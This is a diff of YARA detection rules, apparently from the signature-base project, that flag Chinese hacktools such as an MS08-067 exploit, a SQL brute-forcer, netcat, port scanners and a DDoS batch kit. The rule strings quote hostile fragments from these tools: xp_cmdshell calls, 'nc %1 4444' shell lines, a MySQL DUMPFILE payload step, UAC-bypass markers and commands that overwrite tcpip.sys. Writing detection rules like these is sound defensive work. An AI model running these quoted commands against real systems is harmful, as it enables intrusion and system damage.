+		logic_hash = "0283efd6866ed9417f2d255715f04c0ed6d7a89befce6a3a52c22ac06593c0bd"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 60
+		tags = ""
 
 	strings:
-		$s0 = "/Churraskito/-->Usage: Churraskito.exe \"command\" " fullword ascii
-		$s4 = "fuck,can't find WMI process PID." fullword ascii
-		$s5 = "/Churraskito/-->Found token %s " fullword ascii
-		$s8 = "wmiprvse.exe" fullword ascii
-		$s10 = "SELECT * FROM IIsWebInfo" fullword ascii
-		$s17 = "WinSta0\\Default" fullword ascii
+		$s1 = "Wole32.dll" wide
+		$s3 = "System32\\migwiz" wide
+		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
+		$s5 = "Elevation:Administrator!new:" wide
+		$s6 = "BypassUac" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 260KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Dubrute_Dubrute : FILE
+rule SIGNATURE_BASE_APT_Proxy_Malware_Packed_Dev
 {
 	meta:
-		description = "Chinese Hacktool Set - file DUBrute.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "10aa2017-d563-5953-8672-dbc13ff6b3cf"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L259-L275"
+		description = "APT Malware - Proxy"
+		author = "FRoth"
+		id = "0b81b6c9-86fa-59c1-b58c-80310f6c0680"
+		date = "2014-11-10"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1029-L1044"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8aaae91791bf782c92b97c6e1b0f78fb2a9f3e65"
-		logic_hash = "1e6d8bd24a37e3f4b7de88989251ae904128ff1bf766d4a4408ff8990c6dfd2f"
-		score = 75
+		hash = "6b6a86ceeab64a6cb273debfa82aec58"
+		logic_hash = "64b15aaf93b40744b887c75fa26f4996d72045a55ac82ab4de89a0d9a3714684"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
-		$s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" fullword ascii
-		$s3 = "Create %d IP@Loginl;Password" fullword ascii
-		$s4 = "UBrute.com" fullword ascii
+		$string0 = "PECompact2" fullword
+		$string1 = "[LordPE]"
+		$string2 = "steam_ker.dll"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1020KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Cookietools : FILE
+rule SIGNATURE_BASE_Tzddos_Ddos_Tool_CN
 {
 	meta:
-		description = "Chinese Hacktool Set - file CookieTools.exe"
+		description = "Disclosed hacktool set - file tzddos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "893884e5-6f4c-5f67-9382-8bf1ee45a257"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L277-L294"
+		id = "bf2bfc7b-4db8-5d35-a312-2530a42985d5"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1046-L1065"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b6a3727fe3d214f4fb03aa43fb2bc6fadc42c8be"
-		logic_hash = "7f8c59ef58a92db15d8965e54ed6e26834e268581581af2a0ff98a6f46564e7e"
-		score = 75
+		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
+		logic_hash = "fed09a8586f9b573e46871efa71082f4573d2bd069fde9cc2928b267d0025bab"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" fullword ascii
-		$s2 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
-		$s3 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
-		$s8 = "OnGetPasswordP" fullword ascii
-		$s12 = "http://www.chinesehack.org/" ascii
+		$s0 = "for /f %%a in (host.txt) do (" ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Update_Pcinit : FILE
+rule SIGNATURE_BASE_Ncat_Hacktools_CN
 {
 	meta:
-		description = "Chinese Hacktool Set - file PcInit.exe"
+		description = "Disclosed hacktool set - file nc.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71c34049-97a2-5611-a081-21a85f8631d9"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L296-L314"
+		id = "bdbfaf75-f8c0-508e-b6b1-9ddea179a325"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1067-L1085"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a6facc4453f8cd81b8c18b3b3004fa4d8e2f5344"
-		logic_hash = "ee4b17dfb0d70464669edab1b7610efa607adb2918306ae6c50130024008a169"
-		score = 75
+		hash = "001c0c01c96fa56216159f83f6f298755366e528"
+		logic_hash = "0e059e90447747ed5259da4a870036d37d181c1cfea734ab25e760e81612f0f3"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\svchost.exe" ascii
-		$s2 = "%s%08x.001" fullword ascii
-		$s3 = "Global\\ps%08x" fullword ascii
-		$s4 = "drivers\\" ascii
-		$s5 = "StrStrA" fullword ascii
-		$s6 = "StrToIntA" fullword ascii
+		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
+		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
+		$s3 = "gethostpoop fuxored" fullword ascii
+		$s6 = "VERNOTSUPPORTED" fullword ascii
+		$s7 = "%s [%s] %d (%s)" fullword ascii
+		$s12 = " `--%s' doesn't allow an argument" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dat_Nasllib : FILE
+rule SIGNATURE_BASE_MS08_067_Exploit_Hacktools_CN
 {
 	meta:
-		description = "Chinese Hacktool Set - file NaslLib.dll"
+		description = "Disclosed hacktool set - file cs.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5ce72a4-c2b0-50b2-85bb-acf0bfd354e0"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L316-L331"
+		id = "c15836c7-e739-5cc0-9d41-d651ea3e4738"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1087-L1106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fb0d4263118faaeed2d68e12fab24c59953e862d"
-		logic_hash = "7d2f3c67fe78028a51ba01c88d7eb62c38fe3c918bb03eee41b6583bc464ad78"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "a3e9e0655447494253a1a60dbc763d9661181322"
+		logic_hash = "e5756250de401324d0c86f855bc088c8364e4a632cece25e553939fa621b73d8"
+		score = 60
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "nessus_get_socket_from_connection: fd <%d> is closed" fullword ascii
-		$s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" fullword ascii
-		$s3 = "A FsSniffer backdoor seems to be running on this port%s" fullword ascii
+		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
+		$s3 = "Make SMB Connection error:%d" fullword ascii
+		$s5 = "Send Payload Over!" fullword ascii
+		$s7 = "Maybe Patched!" fullword ascii
+		$s8 = "RpcExceptionCode() = %u" fullword ascii
+		$s11 = "ph4nt0m" fullword wide
+		$s12 = "\\\\%s\\IPC" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1360KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_Dos_1 : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Sql
 {
 	meta:
-		description = "Chinese Hacktool Set - file 1.exe"
+		description = "Disclosed hacktool set - file sql.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f1cc1b3-bce2-5a29-849e-ee7deb5e8809"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L333-L347"
+		id = "77ea95fc-7a6a-522b-8a72-1832598c4d2d"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1108-L1129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b554f0687a12ec3a137f321cc15e052ff219f28c"
-		logic_hash = "d4cf3e738743e5402602e045cf590b969dca2d6f7f1bdd57cc398df3392560d9"
-		score = 75
+		hash = "d5139b865e99b7a276af7ae11b14096adb928245"
+		logic_hash = "139f7308055351d9dc8a704c055360ac9408dcefc9eee4b9f222886fb5249b8c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" fullword ascii
-		$s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" fullword ascii
+		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii
+		$s2 = "s.exe start error...%d" fullword ascii
+		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
+		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
+		$s10 = "Result.txt" fullword ascii
+		$s11 = "Usage:sql.exe [options]" fullword ascii
+		$s17 = "%s root %s %d error" fullword ascii
+		$s18 = "Pass.txt" fullword ascii
+		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		6 of them
 }
-rule SIGNATURE_BASE_Othertools_Servu : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Panda_445TOOL
 {
 	meta:
-		description = "Chinese Hacktool Set - file svu.exe"
+		description = "Disclosed hacktool set - file 445TOOL.rar"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b750d090-8726-5d21-98ba-6cb050cb7174"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L349-L365"
+		id = "02075631-49cc-5b97-ad8e-92d734a26d34"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1131-L1147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5c64e6879a9746a0d65226706e0edc7a"
-		logic_hash = "fda476bdcc0bb496331ca9f506a1221d401d8671d23f61f1b88219c688163169"
-		score = 75
+		hash = "92050ba43029f914696289598cf3b18e34457a11"
+		logic_hash = "69a17bf7735eea946a5326d9535e68b8f010f2a0229875970b1bb15029c6dc4e"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "MZKERNEL32.DLL" fullword ascii
-		$s1 = "UpackByDwing@" fullword ascii
-		$s2 = "GetProcAddress" fullword ascii
-		$s3 = "WriteFile" fullword ascii
+		$s0 = "scan.bat" fullword ascii
+		$s1 = "Http.exe" fullword ascii
+		$s2 = "GOGOGO.bat" fullword ascii
+		$s3 = "ip.txt" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x454b5a4d and $s0 at 0 and filesize < 50KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Ustrrefadd : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Panda_445
 {
 	meta:
-		description = "Chinese Hacktool Set - file ustrrefadd.dll"
+		description = "Disclosed hacktool set - file 445.rar"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e6701e7e-bb15-5e0c-822b-3e29342e083c"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L367-L384"
+		id = "02075631-49cc-5b97-ad8e-92d734a26d34"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1149-L1169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b371b122460951e74094f3db3016264c9c8a0cfa"
-		logic_hash = "e44f180e081494e28b35b4129eb2c1817ed3e83f23d86f0d3dd4dcf27941cdf1"
-		score = 75
+		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
+		logic_hash = "d3f5b2c601dfa1702bbd1f8bdc1f847dd34ba84a6c527a3e02cdb76075e4ad2c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "E-Mail  : admin@luocong.com" fullword ascii
-		$s1 = "Homepage: http://www.luocong.com" fullword ascii
-		$s2 = ": %d  -  " fullword ascii
-		$s3 = "ustrreffix.dll" fullword ascii
-		$s5 = "Ultra String Reference plugin v%d.%02d" fullword ascii
+		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
+		$s1 = "445\\nc.exe" fullword ascii
+		$s2 = "445\\s.exe" fullword ascii
+		$s3 = "cs.exe %1" fullword ascii
+		$s4 = "445\\cs.exe" fullword ascii
+		$s5 = "445\\ip.txt" fullword ascii
+		$s6 = "445\\cmd.bat" fullword ascii
+		$s9 = "@echo off" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 320KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Xscanlib : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Wineggdrop
 {
 	meta:
-		description = "Chinese Hacktool Set - file XScanLib.dll"
+		description = "Disclosed hacktool set - file s.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1e2cfad-7cbb-51c3-9b55-648c47af641e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L386-L402"
+		id = "9b6244ee-5ace-5caa-bfa2-732bcfcfc998"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1171-L1194"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
-		logic_hash = "ff18c527df9ff2a4d72bcc5e4905d6f42877d42536edcb13608c6e0e6773aa63"
-		score = 75
+		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
+		logic_hash = "6123a07038e30e11e37a70b912a1c854c13341e67eaf4ed14ca9954288a42d62"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "XScanLib.dll" fullword ascii
-		$s6 = "Ports/%s/%d" fullword ascii
-		$s8 = "DEFAULT-TCP-PORT" fullword ascii
-		$s9 = "PlugCheckTcpPort" fullword ascii
+		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
+		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
+		$s8 = "Something Wrong About The Ports" fullword ascii
+		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
+		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
+		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
+		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii
+		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
+		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
+		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 360KB and all of them
+		5 of them
 }
-rule SIGNATURE_BASE_Idtools_For_Winxp_Idttool : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Scan_BAT
 {
 	meta:
-		description = "Chinese Hacktool Set - file IdtTool.exe"
+		description = "Disclosed hacktool set - file scan.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c157d467-87f8-59d5-a3ba-e4fbeeba767d"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L404-L419"
+		id = "836e0618-93c7-5519-bbc4-705ff5c2e127"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1196-L1214"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ebab6e4cb7ea82c8dc1fe4154e040e241f4672c6"
-		logic_hash = "9e14db3721afaba3ea5e9767afff593bf2b137306fe673acd7926bf6efc78391"
-		score = 75
+		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
+		logic_hash = "eed941d2ad5d33d7224504b08d2104d4043fab7a2ff027fc54cd1afd42e32549"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "IdtTool.sys" fullword ascii
-		$s4 = "Idt Tool bY tMd[CsP]" fullword wide
-		$s6 = "\\\\.\\slIdtTool" fullword ascii
+		$s0 = "for /f %%a in (host.txt) do (" ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
+		5 of them
 }
-rule SIGNATURE_BASE_Goodtoolset_Ms11046 : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Panda_Burst
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms11046.exe"
+		description = "Disclosed hacktool set - file Burst.rar"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4703861-02a9-5d93-b6de-c3664ca8abb9"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L421-L438"
+		id = "e07c66d1-958e-5ad2-9d5b-380d48af8360"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1216-L1229"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
-		logic_hash = "2fb36a589613f97d0c3a4da58c65352689062a8ba6d432b5f3cf3b51a7e77f8c"
-		score = 75
+		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
+		logic_hash = "c334019cab377f4d96f5daee6a2f1fa7e24ecc43b3aee1eb76537640fdfd8a97"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[*] Token system command" fullword ascii
-		$s2 = "[*] command add user 90sec 90sec" fullword ascii
-		$s3 = "[*] Add to Administrators success" fullword ascii
-		$s4 = "[*] User has been successfully added" fullword ascii
-		$s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 840KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Cmdshell32 : FILE
+rule SIGNATURE_BASE_Hacktools_CN_445_Cmd : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Cmdshell32.exe"
+		description = "Disclosed hacktool set - file cmd.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f1dfb5a1-4292-5895-8310-913cfdf4d9d0"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L440-L455"
+		id = "b9693f51-26ac-5bf1-8c4d-ca852a154636"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1231-L1246"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3c41116d20e06dcb179e7346901c1c11cd81c596"
-		logic_hash = "cfe3d72d33d7a3c2b70d4fa0767a921c1cfcd360b2094af40b067789cace95af"
-		score = 75
+		hash = "69b105a3aec3234819868c1a913772c40c6b727a"
+		logic_hash = "e0ab572fe9009ddc39f34302d8a16531c23f51ce4ea373d57a039f22ccc934c7"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "cmdshell.exe" fullword wide
-		$s2 = "cmdshell" fullword ascii
-		$s3 = "[Root@CmdShell ~]#" fullword wide
+		$bat = "@echo off" fullword ascii
+		$s0 = "cs.exe %1" fullword ascii
+		$s2 = "nc %1 4444" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 62KB and all of them
+		uint32( 0 ) == 0x68636540 and $bat at 0 and all of ( $s* )
 }
-rule SIGNATURE_BASE_Sniffer_Analyzer_Ssclone_1210_Full_Version : FILE
+rule SIGNATURE_BASE_Hacktools_CN_GOGOGO_Bat
 {
 	meta:
-		description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe"
+		description = "Disclosed hacktool set - file GOGOGO.bat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "69dac4bf-483d-5888-a748-1a52cf372066"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L457-L473"
+		id = "b52cc150-81d4-5895-8f83-ee2006f75617"
+		date = "2014-11-17"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1248-L1273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6882125babb60bd0a7b2f1943a40b965b7a03d4e"
-		logic_hash = "982a213a106794e2cddb6148b3d3a119ae17fc318ad03237da1018e1859523d7"
-		score = 75
+		hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
+		logic_hash = "0209ffba87ff07379c768c1c00496a37f0f9bc6b786a31afdafe55d65a9f39ab"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://www.vip80000.com/hot/index.html" fullword ascii
-		$s1 = "GetConnectString" fullword ascii
-		$s2 = "CnCerT.Safe.SSClone.dll" fullword ascii
-		$s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
+		$s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
+		$s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
+		$s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
+		$s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
+		$s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
+		$s6 = "del /f tcpip.sys" fullword ascii
+		$s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
+		$s10 = "call scan.bat" fullword ascii
+		$s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
+		$s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
+		$s18 = "sc config LmHosts start= auto" fullword ascii
+		$s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
+		$s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3580KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_X64_Klock : FILE
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Pass
 {
 	meta:
-		description = "Chinese Hacktool Set - file klock.dll"
+		description = "Disclosed hacktool set - file pass.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7065a4fb-c867-5a94-b6bb-5b60085bea15"
-		date = "2015-06-13"
-		modified = "2023-12-05"
